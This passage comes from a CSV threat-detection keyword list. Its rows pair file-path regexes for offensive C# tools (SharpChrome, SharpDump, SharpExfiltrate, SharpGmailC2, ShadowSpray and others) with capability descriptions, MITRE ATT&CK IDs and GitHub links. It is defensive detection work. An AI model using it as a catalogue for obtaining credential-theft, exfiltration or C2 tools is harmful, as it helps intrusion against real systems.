automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ShadowSpray.exe*",".{0,1000}\\ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ShadowSpray\*.cs*",".{0,1000}\\ShadowSpray\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*\Sharefinder.ps1*",".{0,1000}\\Sharefinder\.ps1.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\sharklog.log*",".{0,1000}\\sharklog\.log.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*\SharpADWS.csproj*",".{0,1000}\\SharpADWS\.csproj.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpADWS.sln*",".{0,1000}\\SharpADWS\.sln.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpADWS\*",".{0,1000}\\SharpADWS\\.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" 
"*\SharpADWS-master*",".{0,1000}\\SharpADWS\-master.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpAzbelt.csproj*",".{0,1000}\\SharpAzbelt\.csproj.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.exe*",".{0,1000}\\SharpAzbelt\.exe.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.sln*",".{0,1000}\\SharpAzbelt\.sln.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpBlock.exe*",".{0,1000}\\SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpBuster.csproj*",".{0,1000}\\SharpBuster\.csproj.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.dll*",".{0,1000}\\SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" 
"*\SharpBuster.exe*",".{0,1000}\\SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.pdb*",".{0,1000}\\SharpBuster\.pdb.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.sln*",".{0,1000}\\SharpBuster\.sln.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpC2*",".{0,1000}\\SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChromium\*",".{0,1000}\\SharpChromium\\.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDomainSpraty\*",".{0,1000}\\SharpDomainSpraty\\.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*\SharpDoor.cs*",".{0,1000}\\SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpEDRChecker-*.zip*",".{0,1000}\\SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker.cs*",".{0,1000}\\SharpEDRChecker\.cs.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging 
tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpEDRChecker.sln*",".{0,1000}\\SharpEDRChecker\.sln.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker\*",".{0,1000}\\SharpEDRChecker\\.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEfsPotato*",".{0,1000}\\SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharPersist\*",".{0,1000}\\SharPersist\\.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpExfiltrate\*",".{0,1000}\\SharpExfiltrate\\.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*\SharpFinder.exe*",".{0,1000}\\SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpGhostTask*",".{0,1000}\\SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*\SharpGmailC2*",".{0,1000}\\SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 